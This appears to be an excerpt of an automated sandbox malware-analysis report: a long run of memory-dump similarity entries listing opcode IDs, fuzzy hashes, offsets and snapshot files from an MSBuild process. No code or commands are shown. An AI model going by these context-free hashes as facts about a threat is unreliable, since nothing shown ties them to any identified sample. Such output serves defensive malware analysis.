                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fe8e2009ca89429246e0c0505a6637dbb6a0fd22f8ffd118611c1e3cc9599106
                                                                                                                                                      • Instruction ID: cbd5538017497863dc6f3dbf89947344b40f2ab71be99f3f8a7fceebc82c3e39
                                                                                                                                                      • Opcode Fuzzy Hash: fe8e2009ca89429246e0c0505a6637dbb6a0fd22f8ffd118611c1e3cc9599106
                                                                                                                                                      • Instruction Fuzzy Hash: 94111F71E4413A4BFF20CA9AC584BBFF6B6FB89224F104426E559E3384E2349A418791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f28bc05999b054f7b1d0ee387f0b18d8476384708ae7f90646c269f68253da00
                                                                                                                                                      • Instruction ID: 98a68ccfb25006b4c23f58216d2df08edeb93badfb3b04831ebf646fe3f544a4
                                                                                                                                                      • Opcode Fuzzy Hash: f28bc05999b054f7b1d0ee387f0b18d8476384708ae7f90646c269f68253da00
                                                                                                                                                      • Instruction Fuzzy Hash: 911156F5E102598BDF60CA9AD88536EFBB6EBC9220F204437E509DB350D334994087D1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 04d01c2eacd98ac24415eb118debba8eee40166ff8c51382a3e55e38750db8d1
                                                                                                                                                      • Instruction ID: 5ddd8b2e56061896078c49cfe97b2a2ace231859e720bec1f80b5d86ba221cf4
                                                                                                                                                      • Opcode Fuzzy Hash: 04d01c2eacd98ac24415eb118debba8eee40166ff8c51382a3e55e38750db8d1
                                                                                                                                                      • Instruction Fuzzy Hash: E6112175E002294BEF28DE9EC8807BEF7B6FB89314F105466D959E7344D2349A41CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5da3f5ebcd7beb37e0c222f5a33246f1166a06c3a6fed44de02f02d338eda3a4
                                                                                                                                                      • Instruction ID: d9c2e230568229b07278a57e5d59f74832143521364bb1dab2ab6cf7d04b7761
                                                                                                                                                      • Opcode Fuzzy Hash: 5da3f5ebcd7beb37e0c222f5a33246f1166a06c3a6fed44de02f02d338eda3a4
                                                                                                                                                      • Instruction Fuzzy Hash: 5021AE34A01224DBEB24DB60C9587BDB7B2FB88704F104828C946A7388DF39DD02CB51
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 67b1d713742c2dba3001c2b8e8ae834bdc77af32923ebe5a4ca609d1194deb87
                                                                                                                                                      • Instruction ID: 1d0b20732e774dc1016fbe3adcb0a184e9665d215b369b081a8b8120b4930fb3
                                                                                                                                                      • Opcode Fuzzy Hash: 67b1d713742c2dba3001c2b8e8ae834bdc77af32923ebe5a4ca609d1194deb87
                                                                                                                                                      • Instruction Fuzzy Hash: FD112179E001294BEF20DE9AC480B7FF6B6FB89314F105426DA5AE3354D2759941C792
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 156e36945cc654294fbcaaccec4f977edf67aa440b0481b89bdcfbc328dd07cc
                                                                                                                                                      • Instruction ID: d6a095001073fc520684ec4b75b6cd8b012017cb3224b13e6eaefb53e8e381a9
                                                                                                                                                      • Opcode Fuzzy Hash: 156e36945cc654294fbcaaccec4f977edf67aa440b0481b89bdcfbc328dd07cc
                                                                                                                                                      • Instruction Fuzzy Hash: 2B111271E1011A5BEF20CAAAD981BBFBEF6FB85320F204537E519E7340D279D9508791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e06d9f3ed113cb0f03aea3a39670ffda5c8a4c1252173a8a72ee7ebaef1ca9d0
                                                                                                                                                      • Instruction ID: 253ac89efc2551f00b5fa79d95e485e8bc4cb0e07132cf39e1064f4f7c984977
                                                                                                                                                      • Opcode Fuzzy Hash: e06d9f3ed113cb0f03aea3a39670ffda5c8a4c1252173a8a72ee7ebaef1ca9d0
                                                                                                                                                      • Instruction Fuzzy Hash: 89113071E102154BDF30CAADC88536EFBBAEF4D320F2A48BAD549E7341E37499408792
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1141f627ab4b9f78c721910038fc12f08ad65a1fba214a7bf28cba4e5d83ef34
                                                                                                                                                      • Instruction ID: 474e7231df7957075c1a17ab62125ed79184a23063330a4611d47436755f6262
                                                                                                                                                      • Opcode Fuzzy Hash: 1141f627ab4b9f78c721910038fc12f08ad65a1fba214a7bf28cba4e5d83ef34
                                                                                                                                                      • Instruction Fuzzy Hash: 14119030E001088FDF60CE58C884AADF7B2FB49314F1689A7D489D7655D73AD851CB80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: efc63e1cb79f7a72ac53ab289cad6d95908139d55ee63e3e9875c31a71053bc2
                                                                                                                                                      • Instruction ID: 0b41d46823b84499aeaa55fb7dc99b13ec2a932c7d3f11b7372f4f8ad726798c
                                                                                                                                                      • Opcode Fuzzy Hash: efc63e1cb79f7a72ac53ab289cad6d95908139d55ee63e3e9875c31a71053bc2
                                                                                                                                                      • Instruction Fuzzy Hash: F6115EB1F042294BEF20CAADC9827BEB7A7FB89224F144836E54DE7344D2B4C9458791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 047616f0857451d000cb84cfa69d2f87901e0565a36236c74d3b5b9227077158
                                                                                                                                                      • Instruction ID: 47763091e39f5f4e340eade48ff8fc7f809198d22a8a192b849de57586fd7dec
                                                                                                                                                      • Opcode Fuzzy Hash: 047616f0857451d000cb84cfa69d2f87901e0565a36236c74d3b5b9227077158
                                                                                                                                                      • Instruction Fuzzy Hash: BF014079E001159BDF30899A9849B7FBAAAF785220F204C6AF51DF7240D275DB814692
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dd38220ac1b36bfa6571777311d5bb9d51e834e15501e513e916b2fe25c5dbd6
                                                                                                                                                      • Instruction ID: c35638be46dae019858f991daf27e1d3993f0adec7e3d056744dc18de57c6c91
                                                                                                                                                      • Opcode Fuzzy Hash: dd38220ac1b36bfa6571777311d5bb9d51e834e15501e513e916b2fe25c5dbd6
                                                                                                                                                      • Instruction Fuzzy Hash: E301B571A082545FDB228AAE594466BFFA6FB42220F168DFFE009C7251E735CD814791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2bfda28754878cc3f85ff7201c5718e05dca97065ff4e7459bebdd0912538ef9
                                                                                                                                                      • Instruction ID: 24321ec482997f2862e093057c6b29cb213c1988945c14b088759e007dbacce1
                                                                                                                                                      • Opcode Fuzzy Hash: 2bfda28754878cc3f85ff7201c5718e05dca97065ff4e7459bebdd0912538ef9
                                                                                                                                                      • Instruction Fuzzy Hash: 96112D71E501154BDF30CAAED88536EF7AAEF8D220F254476D909E7340E374D9408791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8e814a6982bf2d4147e2ee3d313112d91f6c54a54af3ab0987749f74b55ccd78
                                                                                                                                                      • Instruction ID: 985ee1adf7e9f527a93d8702e331278b2c0dbac2abc46a9e988e46f1edcb0176
                                                                                                                                                      • Opcode Fuzzy Hash: 8e814a6982bf2d4147e2ee3d313112d91f6c54a54af3ab0987749f74b55ccd78
                                                                                                                                                      • Instruction Fuzzy Hash: 8911F571F142594FEFB0CA6988803AFFBB5EB89311F20483BE409EB241D730D98487A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0e73b6ed87c3917e541a5b6b6f93ca97322c9885c6eb9df1a8d94861e13ec332
                                                                                                                                                      • Instruction ID: 5f518b83428b49f3890b01611931b3eb8fe3984102a18dd69c66a375a33bca45
                                                                                                                                                      • Opcode Fuzzy Hash: 0e73b6ed87c3917e541a5b6b6f93ca97322c9885c6eb9df1a8d94861e13ec332
                                                                                                                                                      • Instruction Fuzzy Hash: 1421E278D143499FCB01DFA4D8485ADBFB1BF48301F2048AAE805A7251EB389A55CFA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1003624af4ebab4ca9c5ea8b5c9d6e10b4437fc03d1f7f972ab572bfa7950839
                                                                                                                                                      • Instruction ID: 7cfd58d70666780bd416f0f1c57691c4b4fe341d7755ed4106ce86b31bee6fa3
                                                                                                                                                      • Opcode Fuzzy Hash: 1003624af4ebab4ca9c5ea8b5c9d6e10b4437fc03d1f7f972ab572bfa7950839
                                                                                                                                                      • Instruction Fuzzy Hash: 76016875F141154FEF20CAA9CC403AEFBB1EB8D229F258437D84AEB241C730CA808392
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 76d17d710c58dd6f1d8f45458a777dfb6a1a26dfd60b8719a168d3420ec85eef
                                                                                                                                                      • Instruction ID: ee935b25dea57d0ab6c5add08c2045d7636dbb7925a246b09436b0cfe0bee127
                                                                                                                                                      • Opcode Fuzzy Hash: 76d17d710c58dd6f1d8f45458a777dfb6a1a26dfd60b8719a168d3420ec85eef
                                                                                                                                                      • Instruction Fuzzy Hash: 9E21E079D143099FCF01DFB0D9494ADBFB1EF48301B1448AAE905A7361EB399A55CFA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b49cd3c3dbc220392744220046db785b41689f5db8410f34e3c08d9970262826
                                                                                                                                                      • Instruction ID: 2aacc7d8df3af59f0b25c467e13ca4063a726d547edfa34f9accc8119578f618
                                                                                                                                                      • Opcode Fuzzy Hash: b49cd3c3dbc220392744220046db785b41689f5db8410f34e3c08d9970262826
                                                                                                                                                      • Instruction Fuzzy Hash: DB112D71F102194BDFA0CA9ACC8036EF6B5EB8D225F204436E909EB300DB78D9808791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a1c2a8220055fdcf8349ba041c6e89ac5986860f03fd02b53d3d027a54729572
                                                                                                                                                      • Instruction ID: 083070cb72319ce2f1b0a1df14792a78193598f8db3268ca9820d587db2bd3e2
                                                                                                                                                      • Opcode Fuzzy Hash: a1c2a8220055fdcf8349ba041c6e89ac5986860f03fd02b53d3d027a54729572
                                                                                                                                                      • Instruction Fuzzy Hash: A611D231F152555FEF618AEA8C413AEFBB2EB85210F24083BD649EB601D3348B40C7A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fb0ef8a1520b07a78f2c2abd6756fbf9105368dd44a750c624bd27cca45cfb9c
                                                                                                                                                      • Instruction ID: 11403f5a75a9f505725f5f65e12b971aeedcf49ce6d12c2400e8dc5f729c994e
                                                                                                                                                      • Opcode Fuzzy Hash: fb0ef8a1520b07a78f2c2abd6756fbf9105368dd44a750c624bd27cca45cfb9c
                                                                                                                                                      • Instruction Fuzzy Hash: 8101B572E141154BEFB08EAAD9903AEB7B4EB45221F244C37D52AEB241D334CA458762
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7e6a72f31cf1e92a3b663014730dd1a1961b3c4eec40038e69fa6ca7459ba806
                                                                                                                                                      • Instruction ID: 3fc869da249627a509042ea50cb0f59565d910b4f5b063f58bdf3b67390e0bfc
                                                                                                                                                      • Opcode Fuzzy Hash: 7e6a72f31cf1e92a3b663014730dd1a1961b3c4eec40038e69fa6ca7459ba806
                                                                                                                                                      • Instruction Fuzzy Hash: 2221C779D002099FCB40DFB4D8484ADBFB2FF48311F104869D515A7314EB359A95CF61
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f75aa17ca5d683e9c6333a8695e11e502068d147b70f6ecca45050666b80678c
                                                                                                                                                      • Instruction ID: 7b81852906c697ca9d4ba4dce54faf03f7dc0f85d51af63205f6791b27a445df
                                                                                                                                                      • Opcode Fuzzy Hash: f75aa17ca5d683e9c6333a8695e11e502068d147b70f6ecca45050666b80678c
                                                                                                                                                      • Instruction Fuzzy Hash: D72106B9D002099FCF00DFB5D4484ADBBB2FF88314F108866E915A7354EB359A51CFA1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bcbaf17de0ad6fae556e21db7bec83f4ac61ab40399aa4411b89142e46051b4c
                                                                                                                                                      • Instruction ID: efdbe2ddfb16a4baa03d66ba0187683ebc77c69c8148c879419d4588140307e1
                                                                                                                                                      • Opcode Fuzzy Hash: bcbaf17de0ad6fae556e21db7bec83f4ac61ab40399aa4411b89142e46051b4c
                                                                                                                                                      • Instruction Fuzzy Hash: B511D671E042614FFF208A69DD4077EFBB3FB86214F29447BD489E7245D274C9458391
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e43143c329c1e9d8bc41c5c88ff21f8f1c11781574b8a7cda76778d793d157d8
                                                                                                                                                      • Instruction ID: 5d094493ca71d44d6fb05dff0e05462777bef6b0b96b1fa9873261ca3a6f842c
                                                                                                                                                      • Opcode Fuzzy Hash: e43143c329c1e9d8bc41c5c88ff21f8f1c11781574b8a7cda76778d793d157d8
                                                                                                                                                      • Instruction Fuzzy Hash: A411D6B1E042654BEF308A7A9C407FEFFBAFB86224F25446BD489E7255D23889448351
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f8bdfeecbcac48711b1c1300d132705c67be2c1a49525fd4c48a0024525f3334
                                                                                                                                                      • Instruction ID: 58aa3e6da134a3bb5d3fad5696cfff1f9f6941fdff9011d6bbda14068bc1ac7e
                                                                                                                                                      • Opcode Fuzzy Hash: f8bdfeecbcac48711b1c1300d132705c67be2c1a49525fd4c48a0024525f3334
                                                                                                                                                      • Instruction Fuzzy Hash: 5C0125B1E0411947EF208FAAD9407BFF7A6F789310F114827F969D3210E638D9554791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fda92e8956e129e07c1e87d67e47e2e4dea98b16db85a33763adddf6469e2b32
                                                                                                                                                      • Instruction ID: 9be87ca65a76d7622425321f841230354aaa089b706668220beb70d46ac8a3c4
                                                                                                                                                      • Opcode Fuzzy Hash: fda92e8956e129e07c1e87d67e47e2e4dea98b16db85a33763adddf6469e2b32
                                                                                                                                                      • Instruction Fuzzy Hash: 4D012431F042295BCFAA9A648C217EEB3B6AB89600F10057ED515FF380DB36C94AC3D1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7fa3267545bc07b2ff79b56bed54e56f2adcb55ceaa589143e419a259a036f7d
                                                                                                                                                      • Instruction ID: c2d1696174bbab15db196edf74a96be9204543025e22d4afb22b676aa3a4f283
                                                                                                                                                      • Opcode Fuzzy Hash: 7fa3267545bc07b2ff79b56bed54e56f2adcb55ceaa589143e419a259a036f7d
                                                                                                                                                      • Instruction Fuzzy Hash: 5121E2B8D04209EFCB00DFB4D8494ADBFB1EF48300F14486AE911A7251EB359961CF91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d4762721877fdbfbc314997f9200843154dc68804e58dca033d13ca471713812
                                                                                                                                                      • Instruction ID: c952d9b13188bb3e109f67af3eab5c666e38076b661800bfa7fde8394294b365
                                                                                                                                                      • Opcode Fuzzy Hash: d4762721877fdbfbc314997f9200843154dc68804e58dca033d13ca471713812
                                                                                                                                                      • Instruction Fuzzy Hash: F3017571E001195BDF308A5A9940BFFB7ABF789320F204437E929D3204D278D9518791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4f32a65984fcdbf59263d9907d14cd1b041f646af045715d660d4956adb7dd33
                                                                                                                                                      • Instruction ID: be9a630df78ff75b1a1298acdd7eb4506ad0661ea8731bee20814c193642218a
                                                                                                                                                      • Opcode Fuzzy Hash: 4f32a65984fcdbf59263d9907d14cd1b041f646af045715d660d4956adb7dd33
                                                                                                                                                      • Instruction Fuzzy Hash: 5C0162B2A443140FEB20CA6A9C8039ABBADEF8A360F1B44A6E519C7250D365DC424791
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 07afb34779029b75933bdcd4ef31c3d37e3d0d1742fcf3bcfc4ee693527ec7fe
                                                                                                                                                      • Instruction ID: 8c1a5cb227d71f2e7cfe224873680cf38ab52f1654593cbe31e2e8e7f49e67da
                                                                                                                                                      • Opcode Fuzzy Hash: 07afb34779029b75933bdcd4ef31c3d37e3d0d1742fcf3bcfc4ee693527ec7fe
                                                                                                                                                      • Instruction Fuzzy Hash: 3F01A471F142540FEF708DAA9C8435BBBAFEBC6264F25487BE509DB251D235CC414391
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ec2181f81671939ce27ef39fec9d42484354751ae8ec31084296a742efee24b7
                                                                                                                                                      • Instruction ID: a46a07db0cd9d248d4ce3846e729b81711f38c9109207bee19499000cb7d6990
                                                                                                                                                      • Opcode Fuzzy Hash: ec2181f81671939ce27ef39fec9d42484354751ae8ec31084296a742efee24b7
                                                                                                                                                      • Instruction Fuzzy Hash: 4C114671200A809FC364CB28C484F22BBF5FF89314F1949AEE48B8BB62C670F845CB40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dcad8b15b71a3898adbca4b911faa01dccc62823760ac1ade3ffcfe9a40864ae
                                                                                                                                                      • Instruction ID: dc3775d9a2df7a2bdd39ae42148ed26b6785b6220414a5d2bdf76379e53e9cac
                                                                                                                                                      • Opcode Fuzzy Hash: dcad8b15b71a3898adbca4b911faa01dccc62823760ac1ade3ffcfe9a40864ae
                                                                                                                                                      • Instruction Fuzzy Hash: 2E01A432F242264FEB6089A99C423ABE769EB8D222F154837F519DB351DB34CC814395
                                                                                                                                                      Memory Dump Source
